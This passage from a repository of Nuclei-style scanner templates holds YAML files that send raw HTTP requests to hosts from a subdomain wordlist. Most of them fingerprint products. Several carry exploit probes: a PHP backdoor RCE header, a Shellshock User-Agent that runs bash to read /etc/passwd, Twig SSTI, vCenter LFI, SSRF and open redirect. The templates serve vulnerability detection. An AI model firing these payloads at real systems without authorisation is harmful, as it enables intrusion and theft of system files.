18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | Accept-Encoding: gzip, deflate
21 | Connection: close
22 | User-Agentt: zerodiumvar_dump(233*233);
23 | matchers-condition: and
24 | matchers:
25 |
26 | - type: word
27 | words:
28 | - "int(54289)"
29 | part: body
30 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/rce-shellshock-user-agent.yaml:
--------------------------------------------------------------------------------
1 | id: rce-user-agent-shell-shock
2 |
3 | info:
4 | name: Remote Code Execution Via (User-Agent)
5 | author: 0xelkomy
6 | severity: high
7 | tags: shellshock,rce
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /cgi-bin/status HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'
20 | matchers:
21 | - type: regex
22 | regex:
23 | - "root:.*:0:0"
24 | part: body
--------------------------------------------------------------------------------
/Templates/Misconfiguration/twig-php-ssti.yaml:
--------------------------------------------------------------------------------
1 | id: twig-php-ssti
2 |
3 | info:
4 | name: Twig PHP <2.4.4 template engine - SSTI
5 | author: madrobot
6 | severity: high
7 | tags: php,ssti
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /search?search_key={{1337*1338}} HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | words:
25 | - "1788906"
26 | part: body
27 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/unauthenticated-lansweeper.yaml:
--------------------------------------------------------------------------------
1 | id: unauthenticated-lansweeper
2 |
3 | info:
4 | name: Unauthenticated Lansweeper Instance
5 | author: divya_mudgal
6 | severity: high
7 | tags: lansweeper,unauth
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /Default.aspx HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | words:
25 | - "Main page - Lansweeper"
--------------------------------------------------------------------------------
/Templates/Misconfiguration/vmware-vcenter-lfi-linux.yaml:
--------------------------------------------------------------------------------
1 | id: vmware-vcenter-lfi-linux 1
2 |
3 | info:
4 | name: Vmware Vcenter LFI for Linux appliances
5 | author: PR3R00T
6 | severity: high
7 | tags: vmware,lfi
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /eam/vib?id=/etc/issue HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 | - type: word
25 | words:
26 | - "vCenter Server"
--------------------------------------------------------------------------------
/Templates/Misconfiguration/wp-xmlrpc.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-xmlrpc-file
2 |
3 | info:
4 | name: WordPress xmlrpc
5 | author: udit_thakkur
6 | severity: info
7 | tags: wordpress
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /xmlrpc.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | words:
25 | - 'XML-RPC server accepts POST requests only.'
26 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/wptouch-open-redirect.yaml:
--------------------------------------------------------------------------------
1 | id: wptouch-open-redirect
2 |
3 | info:
4 | name: WPTouch Switch Desktop 3.x Open Redirection
5 | author: 0x_Akoko
6 | severity: medium
7 | reference: https://cxsecurity.com/issue/WLB-2020030114
8 | tags: wp-plugin,redirect,wordpress
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /?wptouch_switch=desktop&redirect=https://example.com/ HTTP/1.1
19 | Host: {{Subdomains}}
20 |
21 | matchers:
22 | - type: regex
23 | regex:
24 | - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
25 | part: header
26 |
--------------------------------------------------------------------------------
/Templates/SSRF/linkerd-ssrf-detect.yaml:
--------------------------------------------------------------------------------
1 | id: linkerd-ssrf-detection
2 |
3 | info:
4 | name: Linkerd SSRF detection
5 | author: dudez
6 | severity: high
7 | tags: ssrf,linkerd,oob
8 | reference: https://twitter.com/nirvana_msu/status/1084144955034165248
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | Accept-Encoding: gzip, deflate
21 | l5d-dtab: /svc/* => /$/inet/{{Host}}.{{Port}}.{{Subdomains}}.linkerd.{{MY-DOMAIN}}/443
22 |
--------------------------------------------------------------------------------
/Templates/Technologies/cockpit-detect.yaml:
--------------------------------------------------------------------------------
1 | id: cockpit-detect
2 |
3 | info:
4 | name: Detect Agentejo Cockpit
5 | author: dwisiswant0
6 | severity: info
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET /auth/login HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
19 | Accept-Encoding: gzip, deflate
20 | Accept: */*
21 |
22 | matchers:
23 | - type: word
24 | words:
25 | - "Authenticate Please!"
--------------------------------------------------------------------------------
/Templates/Technologies/default-iis7-page.yaml:
--------------------------------------------------------------------------------
1 | id: default-iis7-page
2 |
3 | info:
4 | name: IIS-7 Default Page
5 | author: dhiyaneshDk
6 | severity: info
7 | tags: tech,iis
8 | reference: https://www.shodan.io/search?query=http.title%3A%22IIS7%22
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
21 | Accept-Encoding: gzip, deflate
22 | Accept: */*
23 |
24 | matchers:
25 | - type: word
26 | words:
27 | - "IIS7"
28 | part: body
--------------------------------------------------------------------------------
/Templates/Technologies/dotclear-detect-2.yaml:
--------------------------------------------------------------------------------
1 | id: dotclear-detect 2
2 |
3 | info:
4 | name: Dotclear Detect
5 | author: pikpikcu
6 | severity: info
7 | tags: tech,dotclear
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /auth.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 |
23 | matchers-condition: and
24 | matchers:
25 | - type: word
26 | words:
27 | - "Dotclear"
28 | - type: status
29 | status:
30 | - 200
--------------------------------------------------------------------------------
/Templates/Technologies/firebase-detect.yaml:
--------------------------------------------------------------------------------
1 | id: firebase-detect
2 |
3 | info:
4 | name: firebase detect
5 | author: organiccrap
6 | severity: low
7 | # http://ghostlulz.com/google-exposed-firebase-database/
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /.settings/rules.json?auth=FIREBASE_SECRET HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 |
23 | matchers:
24 | - type: word
25 | words:
26 | - "Could not parse auth token"
27 | part: body
28 |
--------------------------------------------------------------------------------
/Templates/Technologies/google-storage.yaml:
--------------------------------------------------------------------------------
1 | id: gstorage-detect
2 |
3 | info:
4 | name: Google Bucket detection
5 | author: 0xTeles
6 | severity: info
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET / HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
19 | Accept-Encoding: gzip, deflate
20 | Accept: */*
21 |
22 | matchers:
23 | - type: word
24 | words:
25 | - x-goog-metageneration
26 | - X-Goog-Metageneration
27 | part: header
--------------------------------------------------------------------------------
/Templates/Technologies/harbor-detect.yaml:
--------------------------------------------------------------------------------
1 | id: harbor-detect
2 | info:
3 | name: Harbor Detect
4 | author: pikpikcu
5 | severity: info
6 |
7 | requests:
8 | - payloads:
9 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
10 | attack: sniper
11 | threads: 100
12 |
13 | raw:
14 | - |
15 | GET / HTTP/1.1
16 | Host: {{Subdomains}}
17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
18 | Accept-Encoding: gzip, deflate
19 | Accept: */*
20 |
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - "Harbor"
26 | part: body
27 |
28 | - type: status
29 | status:
30 | - 200
31 |
--------------------------------------------------------------------------------
/Templates/Technologies/hikvision-detection-1.yaml:
--------------------------------------------------------------------------------
1 | id: hikvision-detection-1
2 |
3 | info:
4 | name: Hikvision Detection
5 | author: pdteam
6 | severity: info
7 | tags: tech,hikvision
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /doc/page/login.asp HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | words:
25 | - "Hikvision Digital Technology"
--------------------------------------------------------------------------------
/Templates/Technologies/hikvision-detection-2.yaml:
--------------------------------------------------------------------------------
1 | id: hikvision-detection-1
2 |
3 | info:
4 | name: Hikvision Detection
5 | author: pdteam
6 | severity: info
7 | tags: tech,hikvision
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /favicon.ico HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: dsl
24 | name: favicon
25 | dsl:
26 | - "status_code==200 && ('999357577' == mmh3(base64_py(body)))"
--------------------------------------------------------------------------------
/Templates/Technologies/home-assistant.yaml:
--------------------------------------------------------------------------------
1 | id: home-assistant
2 |
3 | info:
4 | name: Detect Home Assistant
5 | author: fabaff
6 | severity: info
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET / HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
19 | Accept-Encoding: gzip, deflate
20 | Accept: */*
21 |
22 | matchers:
23 | - type: word
24 | words:
25 | - "Home Assistant"
--------------------------------------------------------------------------------
/Templates/Technologies/maian-cart-detect.yaml:
--------------------------------------------------------------------------------
1 | id: maian-cart-detect
2 |
3 | info:
4 | name: Maian Cart Detection
5 | author: pdteam
6 | severity: info
7 | tags: tech,maian
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /favicon.ico HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 |
23 | matchers-condition: and
24 | matchers:
25 | - type: dsl
26 | dsl:
27 | - "status_code==200 && (\"-498581627\" == mmh3(base64_py(body)))"
--------------------------------------------------------------------------------
/Templates/Technologies/network-camera-detect.yaml:
--------------------------------------------------------------------------------
1 | id: network-camera-detect
2 |
3 | info:
4 | name: Various Online Devices Detection (Network Camera)
5 | author: iamthefrogy
6 | severity: info
7 | tags: iot
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /CgiStart?page=Single HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 |
23 | matchers:
24 | - type: word
25 | words:
26 | - Network Camera
--------------------------------------------------------------------------------
/Templates/Technologies/prometheus-exposed-panel.yaml:
--------------------------------------------------------------------------------
1 | id: prometheus-exposed-panel
2 | info:
3 | name: Prometheus.io exposed panel
4 | author: organiccrap
5 | severity: low
6 | # usually runs on port http/9090
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET /graph HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
19 | Accept-Encoding: gzip, deflate
20 | Accept: */*
21 |
22 | matchers:
23 | - type: word
24 | words:
25 | - Prometheus Time Series Collection and Processing Server
--------------------------------------------------------------------------------
/Templates/Technologies/s3-detect.yaml:
--------------------------------------------------------------------------------
1 | id: s3-detect
2 |
3 | info:
4 | name: Detect Amazon-S3 Bucket
5 | author: melbadry9
6 | severity: info
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET /%c0 HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
19 | Accept-Encoding: gzip, deflate
20 | Accept: */*
21 |
22 | matchers:
23 | - type: regex
24 | regex:
25 | - "(?:InvalidURI|InvalidArgument|NoSuchBucket)"
26 | part: body
27 |
--------------------------------------------------------------------------------
/Templates/Technologies/shiro-detect.yaml:
--------------------------------------------------------------------------------
1 | id: shiro-detect
2 | info:
3 | name: Detect Shiro Framework
4 | author: AresX
5 | severity: info
6 |
7 | requests:
8 | - payloads:
9 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
10 | attack: sniper
11 | threads: 100
12 |
13 | raw:
14 | - |
15 | GET / HTTP/1.1
16 | Host: {{Subdomains}}
17 | Cookie: rememberMe=123;
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
19 | Accept-Encoding: gzip, deflate
20 | Accept: */*
21 |
22 | matchers-condition: and
23 | matchers:
24 | - type: word
25 | words:
26 | - rememberMe=deleteMe
27 | part: header
--------------------------------------------------------------------------------
/Templates/Technologies/sql-server-reporting.yaml:
--------------------------------------------------------------------------------
1 | id: sql-server-reporting
2 |
3 | info:
4 | name: Detect Microsoft SQL Server Reporting
5 | author: puzzlepeaches
6 | severity: info
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET /Reports/Pages/Folder.aspx HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
19 | Accept-Encoding: gzip, deflate
20 | Accept: */*
21 |
22 | matchers:
23 | - type: word
24 | words:
25 | - "Report Manager"
26 |
--------------------------------------------------------------------------------
/Templates/Technologies/telerik-fileupload-detect.yaml:
--------------------------------------------------------------------------------
1 | id: telerik-fileupload-detect
2 |
3 | info:
4 | name: Detect Telerik Web UI fileupload handler
5 | author: organiccrap
6 | severity: info
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
19 | Accept-Encoding: gzip, deflate
20 | Accept: */*
21 |
22 | matchers:
23 | - type: word
24 | words:
25 | - "RadAsyncUpload handler is registered succesfully"
26 |
--------------------------------------------------------------------------------
/Templates/Technologies/weblogic-detect.yaml:
--------------------------------------------------------------------------------
1 | id: weblogic-detect
2 |
3 | info:
4 | name: Detect Weblogic
5 | author: bing0o
6 | severity: info
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET /console/login/LoginForm.jsp HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
19 | Accept-Encoding: gzip, deflate
20 | Accept: */*
21 |
22 | matchers:
23 | - type: word
24 | words:
25 | - "WebLogic"
--------------------------------------------------------------------------------
/Templates/Technologies/werkzeug-debugger-detect.yaml:
--------------------------------------------------------------------------------
1 | id: werkzeug-debugger-detect
2 |
3 | info:
4 | name: Werkzeug debugger console
5 | author: pdteam
6 | severity: info
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET /console HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
19 | Accept-Encoding: gzip, deflate
20 | Accept: */*
21 |
22 | matchers:
23 | - type: word
24 | words:
25 | - "Interactive Console
"
26 | part: body
--------------------------------------------------------------------------------